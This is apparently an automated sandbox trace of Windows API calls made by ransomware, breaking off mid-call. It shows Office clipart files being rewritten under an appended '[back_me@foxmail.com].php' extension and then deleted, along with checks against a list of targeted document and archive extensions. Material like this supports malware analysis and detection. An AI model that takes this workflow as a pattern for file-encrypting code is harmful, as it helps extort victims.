CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105246.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0259.484] GetLastError () returned 0x0 [0259.484] ReadFile (in: hFile=0x384, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x4b80, lpOverlapped=0x0) returned 1 [0259.496] WriteFile (in: hFile=0x3d0, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x4b90, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x4b90, lpOverlapped=0x0) returned 1 [0259.497] ReadFile (in: hFile=0x384, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0259.497] WriteFile (in: hFile=0x3d0, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0259.497] SetEndOfFile (hFile=0x3d0) returned 1 [0259.628] CloseHandle (hObject=0x3d0) returned 1 [0259.628] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.628] SetEndOfFile (hFile=0x384) returned 1 [0259.630] CloseHandle (hObject=0x384) returned 1 [0259.630] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0259.636] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105246.wmf")) returned 1 [0259.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF") returned 63 [0259.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF") returned 63 [0259.640] lstrlenW (lpString=".doc") returned 4 [0259.641] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0259.641] lstrlenW (lpString=".docx") returned 5 [0259.641] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0259.641] lstrlenW (lpString=".pdf") returned 4 [0259.641] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0259.641] lstrlenW (lpString=".xls") returned 4 [0259.641] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0259.641] lstrlenW (lpString=".xlsx") returned 5 [0259.641] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0259.641] lstrlenW (lpString=".ppt") returned 4 [0259.641] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0259.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF") returned 63 [0259.641] lstrlenW (lpString=".zip") returned 4 [0259.641] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0259.641] lstrlenW (lpString=".rar") returned 4 [0259.641] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0259.641] lstrlenW (lpString=".bz2") returned 4 [0259.641] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0259.641] lstrlenW (lpString=".7z") returned 3 [0259.641] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0259.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF") returned 63 [0259.641] lstrlenW (lpString=".dbf") returned 4 [0259.641] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0259.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF") returned 63 [0259.641] lstrlenW (lpString=".1cd") returned 4 [0259.641] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0259.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF") returned 63 [0259.641] lstrlenW (lpString=".jpg") returned 4 [0259.642] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0259.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF") returned 63 [0259.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF") returned 63 [0259.642] lstrlenW (lpString=".doc") returned 4 [0259.642] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0259.642] lstrlenW (lpString=".docx") returned 5 [0259.642] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0259.642] lstrlenW (lpString=".pdf") returned 4 [0259.642] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0259.642] lstrlenW (lpString=".xls") returned 4 [0259.642] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0259.642] lstrlenW (lpString=".xlsx") returned 5 [0259.642] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0259.642] lstrlenW (lpString=".ppt") returned 4 [0259.642] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0259.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF") returned 63 [0259.642] lstrlenW (lpString=".zip") returned 4 [0259.642] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0259.642] lstrlenW (lpString=".rar") returned 4 [0259.642] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0259.642] lstrlenW (lpString=".bz2") returned 4 [0259.642] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0259.642] lstrlenW (lpString=".7z") returned 3 [0259.642] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0259.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF") returned 63 [0259.642] lstrlenW (lpString=".dbf") returned 4 [0259.642] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0259.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF") returned 63 [0259.642] lstrlenW (lpString=".1cd") returned 4 [0259.642] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0259.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF") returned 63 [0259.643] lstrlenW (lpString=".jpg") returned 4 [0259.643] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0259.643] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0259.643] lstrlenW (lpString="J0105328.WMF") returned 12 [0259.643] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105328.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0259.643] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=7992) returned 1 [0259.643] CloseHandle (hObject=0x210) returned 1 [0259.643] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105328.wmf")) returned 0x20 [0259.643] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105328.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0259.644] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105328.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0259.644] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.644] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.644] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105328.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8 [0259.644] GetLastError () returned 0x0 [0259.644] ReadFile (in: hFile=0x210, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x1f38, lpOverlapped=0x0) returned 1 [0259.648] WriteFile (in: hFile=0x3d8, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x1f40, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x1f40, lpOverlapped=0x0) returned 1 [0259.649] ReadFile (in: hFile=0x210, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0259.649] WriteFile (in: hFile=0x3d8, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0259.649] SetEndOfFile (hFile=0x3d8) returned 1 [0259.649] CloseHandle (hObject=0x3d8) returned 1 [0259.649] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.649] SetEndOfFile (hFile=0x210) returned 1 [0259.651] CloseHandle (hObject=0x210) returned 1 [0259.651] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0259.651] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105328.wmf")) returned 1 [0259.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF") returned 63 [0259.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF") returned 63 [0259.652] lstrlenW (lpString=".doc") returned 4 [0259.652] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0259.652] lstrlenW (lpString=".docx") returned 5 [0259.652] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0259.652] lstrlenW (lpString=".pdf") returned 4 [0259.652] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0259.652] lstrlenW (lpString=".xls") returned 4 [0259.652] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0259.652] lstrlenW (lpString=".xlsx") returned 5 [0259.652] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0259.652] lstrlenW (lpString=".ppt") returned 4 [0259.652] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0259.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF") returned 63 [0259.652] lstrlenW (lpString=".zip") returned 4 [0259.652] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0259.652] lstrlenW (lpString=".rar") returned 4 [0259.652] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0259.652] lstrlenW (lpString=".bz2") returned 4 [0259.652] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0259.652] lstrlenW (lpString=".7z") returned 3 [0259.652] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0259.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF") returned 63 [0259.652] lstrlenW (lpString=".dbf") returned 4 [0259.652] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0259.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF") returned 63 [0259.652] lstrlenW (lpString=".1cd") returned 4 [0259.653] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0259.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF") returned 63 [0259.653] lstrlenW (lpString=".jpg") returned 4 [0259.653] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0259.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF") returned 63 [0259.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF") returned 63 [0259.653] lstrlenW (lpString=".doc") returned 4 [0259.653] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0259.653] lstrlenW (lpString=".docx") returned 5 [0259.653] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0259.653] lstrlenW (lpString=".pdf") returned 4 [0259.653] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0259.653] lstrlenW (lpString=".xls") returned 4 [0259.653] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0259.653] lstrlenW (lpString=".xlsx") returned 5 [0259.653] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0259.653] lstrlenW (lpString=".ppt") returned 4 [0259.653] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0259.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF") returned 63 [0259.653] lstrlenW (lpString=".zip") returned 4 [0259.653] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0259.653] lstrlenW (lpString=".rar") returned 4 [0259.653] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0259.653] lstrlenW (lpString=".bz2") returned 4 [0259.653] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0259.653] lstrlenW (lpString=".7z") returned 3 [0259.653] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0259.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF") returned 63 [0259.653] lstrlenW (lpString=".dbf") returned 4 [0259.653] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0259.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF") returned 63 [0259.653] lstrlenW (lpString=".1cd") returned 4 [0259.654] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0259.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF") returned 63 [0259.654] lstrlenW (lpString=".jpg") returned 4 [0259.654] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0259.654] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0259.654] lstrlenW (lpString="J0105332.WMF") returned 12 [0259.654] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105332.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0259.654] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=10508) returned 1 [0259.654] CloseHandle (hObject=0x210) returned 1 [0259.654] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105332.wmf")) returned 0x20 [0259.654] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105332.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0259.654] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105332.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0259.655] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.655] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105332.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8 [0259.655] GetLastError () returned 0x0 [0259.655] ReadFile (in: hFile=0x210, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x290c, lpOverlapped=0x0) returned 1 [0259.656] WriteFile (in: hFile=0x3d8, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x2910, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x2910, lpOverlapped=0x0) returned 1 [0259.657] ReadFile (in: hFile=0x210, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0259.657] WriteFile (in: hFile=0x3d8, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0259.657] SetEndOfFile (hFile=0x3d8) returned 1 [0259.657] CloseHandle (hObject=0x3d8) returned 1 [0259.657] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.657] SetEndOfFile (hFile=0x210) returned 1 [0259.660] CloseHandle (hObject=0x210) returned 1 [0259.660] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0259.660] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105332.wmf")) returned 1 [0259.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF") returned 63 [0259.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF") returned 63 [0259.660] lstrlenW (lpString=".doc") returned 4 [0259.660] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0259.660] lstrlenW (lpString=".docx") returned 5 [0259.660] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0259.660] lstrlenW (lpString=".pdf") returned 4 [0259.660] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0259.660] lstrlenW (lpString=".xls") returned 4 [0259.660] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0259.660] lstrlenW (lpString=".xlsx") returned 5 [0259.660] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0259.660] lstrlenW (lpString=".ppt") returned 4 [0259.660] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0259.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF") returned 63 [0259.660] lstrlenW (lpString=".zip") returned 4 [0259.660] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0259.660] lstrlenW (lpString=".rar") returned 4 [0259.660] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0259.661] lstrlenW (lpString=".bz2") returned 4 [0259.661] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0259.661] lstrlenW (lpString=".7z") returned 3 [0259.661] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0259.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF") returned 63 [0259.661] lstrlenW (lpString=".dbf") returned 4 [0259.661] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0259.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF") returned 63 [0259.661] lstrlenW (lpString=".1cd") returned 4 [0259.661] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0259.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF") returned 63 [0259.661] lstrlenW (lpString=".jpg") returned 4 [0259.661] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0259.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF") returned 63 [0259.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF") returned 63 [0259.661] lstrlenW (lpString=".doc") returned 4 [0259.661] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0259.661] lstrlenW (lpString=".docx") returned 5 [0259.661] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0259.661] lstrlenW (lpString=".pdf") returned 4 [0259.661] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0259.661] lstrlenW (lpString=".xls") returned 4 [0259.661] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0259.661] lstrlenW (lpString=".xlsx") returned 5 [0259.661] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0259.661] lstrlenW (lpString=".ppt") returned 4 [0259.661] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0259.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF") returned 63 [0259.661] lstrlenW (lpString=".zip") returned 4 [0259.661] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0259.661] lstrlenW (lpString=".rar") returned 4 [0259.661] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0259.662] lstrlenW (lpString=".bz2") returned 4 [0259.662] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0259.662] lstrlenW (lpString=".7z") returned 3 [0259.662] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0259.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF") returned 63 [0259.662] lstrlenW (lpString=".dbf") returned 4 [0259.662] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0259.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF") returned 63 [0259.662] lstrlenW (lpString=".1cd") returned 4 [0259.662] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0259.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF") returned 63 [0259.662] lstrlenW (lpString=".jpg") returned 4 [0259.662] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0259.662] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0259.662] lstrlenW (lpString="J0105336.WMF") returned 12 [0259.662] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105336.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0259.663] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=2900) returned 1 [0259.663] CloseHandle (hObject=0x210) returned 1 [0259.663] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105336.wmf")) returned 0x20 [0259.663] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105336.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0259.663] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105336.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0259.663] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.663] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.663] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105336.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8 [0259.663] GetLastError () returned 0x0 [0259.663] ReadFile (in: hFile=0x210, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0xb54, lpOverlapped=0x0) returned 1 [0259.665] WriteFile (in: hFile=0x3d8, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xb60, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xb60, lpOverlapped=0x0) returned 1 [0259.666] ReadFile (in: hFile=0x210, lpBuffer=0x4290020, 